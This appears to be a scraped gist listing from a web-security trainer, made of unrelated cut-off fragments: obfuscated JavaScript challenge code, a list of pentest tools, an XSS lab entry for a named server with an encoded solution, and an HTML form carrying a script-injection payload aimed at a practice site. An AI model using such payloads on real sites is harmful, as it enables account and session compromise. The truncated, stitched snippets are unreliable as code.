Skip to content

Instantly share code, notes, and snippets.

@The-XSS-Rat
The-XSS-Rat / couponCodeObfuscated.js
Created May 10, 2021 23:34
couponCodeObfuscated.js
var _0x19c2=['y2fJAgvmzw5NDgG','uwvQuxe','ChjVCeHVB2TZ','rJjpO','vvL1Bhm','yunVCuS','set','vu5uwK8','sKjoEfq','childNodes','RSZOA','DfzMyw4','suflr0K','y2XHC3m','CM91svm','getRootNode','tM8Gy29UDMvYC2LVBIbMCM9Tia','C2v0','dir','easing','hasClass','width:60%;top:1%','AVcin','Dgv4Da','eCzau','prototype','NMcrw','ZHZhc','z2v0rwXLBwvUDhncEunSyxnZtMfTzq','yutlX','checkOn','AxnjBw1LzgLHDgvqCM9WywDHDgLVBLn0B3bWzwq','phuBG','CgfNzvLpzMzZzxq','Aw5SAw5LlwjSB2nR','DgHLBG','z0nerxy','eWFaH','CwHytLu','eZwYo','z1v1DKO','BwvZC2fNzq','round','oEVje','vgzXChy','AgfUzgXL','GvtMe','Bg9JAW','hdpuX','SAqPP','BNrO','zlvLZ','B2jQzwn0','val','yxv0BW','hasContent','y2HLy2TLza','Dw5PCxvL','ANnVBNbdywXSyMfJAW','HPhQF','yMfJA2DYB3vUzenSAxa','cssNumber','xxFUw','inArray','rNrfCey','y29UDgfPBNm','uHmlN','CxnH','Eu1bA1y','C29YDerLDgfJAgvK','zML4zwq','EKjNC0y','DgLJAW','filters','isArray','visible','y2XVBMvoB2rL','zM9JDxnPBG','overflowY','tKHcEfK','y1jKB3y','origType','z2v0qM91BMrPBMDdBgLLBNrszwn0','C29YDfn0ywjSzq','AxnytuXeB2m','vhLiD0O',
We can make this file beautiful and searchable if this error is corrected: No commas found in this CSV file in line 0.
nmap
nikto
wireshark
hping3
dnsmap
john
ettercap
netcat
dotdotpwn
recon-ng
Servers
---------------------------
XSS
---------------------------
http://23.239.9.22/cheeseBlog Basic stored XSS on homepage
Solution:
3333333633333338333333373333333433333337333333343333333733333330333333373333333333333333333633313333333233363336333333323336333633333337333333373333333733333337333333373333333733333332333633353333333733333335333333363333333433333336333333353333333633363334333333373333333933333332333633353333333633333333333333363336333633333336333633343333333233363336333333363333333333333336333633363333333733333335333333373333333233333337333333333333333633333335333333323336333633333337333333353333333633363335333333363333333333333336333633333333333633333335333333323336333433333337333333323333333633333331333333373333333433333337333333333333333233363334333333363333333233333337333333353333333633333337333333323336333433333336333333323333333633363336333333373333333533333336333633353333333733333334333333373333333933333332333633343333333633333337333333373333333533333336333333393333333633333334333333363333333533333332333633363333333333363336333333363333333333333336333633363333333733333335333333373333333033333336333633363333333633363335
JJNEERCFKNBUUR2SINDESU2DJJGEESSUJVHEWRKKIZDVMTKOINEUSNBSIRDVKMSOJFMVURKHJZBFKSKSJFCTEVKTKZFTKQSVLFLEGRKKLEZFMT2VLJLUYSSHIZFVIU2DJNLEYVKPK5FU2SSWIRDE2VSLJBEU4TKUI5KEGT2JLJGUKT2UGJGUUUSFIU3FMU2WJM2UKVSVKNJU6SSWINLE6V2DKZFUCWSVJFKFEVSHJJGUKQ2NLJKEUNKFIZGVEU2HJFDEWVKFKZJUQSS2IVCUSVKKGVEFKNSRHU6T2PI=
<?php
session_start();
include 'instructions.php';
if (empty($_SESSION['token'])) {
$_SESSION['token'] = bin2hex(random_bytes(32));
}
$token = $_SESSION['token'];
<html><form enctype="application/x-www-form-urlencoded" method="POST" action="http://hackxpert.com/RXSS/POST/20.php"><table><tr><td>say</td><td><input type="text" value="Hi" name="say"></td></tr>
<tr><td>hidden</td><td><input type="text" value="--><script>alert()</script>" name="hidden"></td></tr>
</table><input type="submit" value="http://hackxpert.com/RXSS/POST/20.php"></form></html>
function _0x11c8(_0x33a6bf,_0x3ce30c){var _0x4b64a6=_0x1dcc();return _0x11c8=function(_0x4a9b73,_0x5402aa){_0x4a9b73=_0x4a9b73-0x10c;var _0x54b6dc=_0x4b64a6[_0x4a9b73];return _0x54b6dc;},_0x11c8(_0x33a6bf,_0x3ce30c);}function _0x1dcc(){var _0x542ab5=['reliableTrDimensions','mimeType','fireWith','contentType','notifyWith','isPlainObject','abort','nonce','children','pixelBoxStyles','ajaxTransport','selectors','getAttribute','focus','content-box','?|\x5c\x5c([^\x5cr\x5cn\x5cf])','prefilters','cur','text/xml','delegateCount','parse','nth','content','expand',')*)|','cleanData','offsetWidth','sort','getResponseHeader','Event','run','timeStamp','canceled','display','getElementsByClassName','merge','resolveWith','flat','valHooks','makeArray','Animation','TAG','defaultView','opts','handler','off','checkClone','Deferred','documentElement','\x20to\x20','stop','setRequestHeader','empty','now','addEventListener','auto','-\x0d\x5c\x27\x20msallowcapture=\x27\x27>','checked','[msallowcapture^=\x27\x27]','fromCharCode','of-ty
Revisions
===========
0.1 - Draft - Wesley Thijs
0.2 - Review 1 - Uncle rat
0.3 -
Document goals
===========
The goal of this document is to inform the client of the intention of the pentest before it occurs. We want to describe who will test, how they will test and what tools they will be using.
import random
# utytyur6ryt
def printRand():
return random.randint(1, 11)
# The XXS noob
def drawNew(a, b):